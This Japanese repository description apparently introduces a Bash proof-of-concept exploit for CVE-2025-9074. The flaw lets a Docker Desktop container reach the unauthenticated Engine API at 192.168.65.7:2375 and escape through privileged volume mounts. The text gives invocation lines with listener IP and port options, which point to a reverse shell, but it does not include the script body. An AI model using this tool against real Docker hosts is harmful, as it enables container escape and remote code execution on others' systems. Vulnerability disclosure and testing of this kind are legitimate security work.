
CVE-2025-9074向けのBashベースのPoCエクスプロイト。認証されていないDocker Engine APIを標的とし、特権ボリュームマウントを介してコンテナエスケープとリモートコード実行を実現します。
Docker Desktop における重大な脆弱性 CVE-2025-9074 は、ローカルで実行中の Linux コンテナがデフォルトのサブネット(192.168.65.7:2375)を介して Docker Engine API に接続できるようにします。この問題は、Enhanced Container Isolation(ECI)や TCP 公開設定に関係なく発生します。CVE-2025-9074 の Proof of Concept エクスプロイトコードは公開されています。この脆弱性により、ホストシステム上のユーザーファイルへの不正アクセスが可能になる可能性があります。したがって、リスクレベルは High Risk と評価されています。
認証なしで公開された Docker API(通常はポート 2375)を悪用するためのスタンドアロン Bash スクリプト。このツールは、ボリュームマウントを介したコンテナブレイクアウトを自動化し、リモートコード実行を可能にします。
curl や grep など)のみを使用して Bash で完全に実装されています。外部バイナリやサードパーティ製ツールは必要ありません。chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
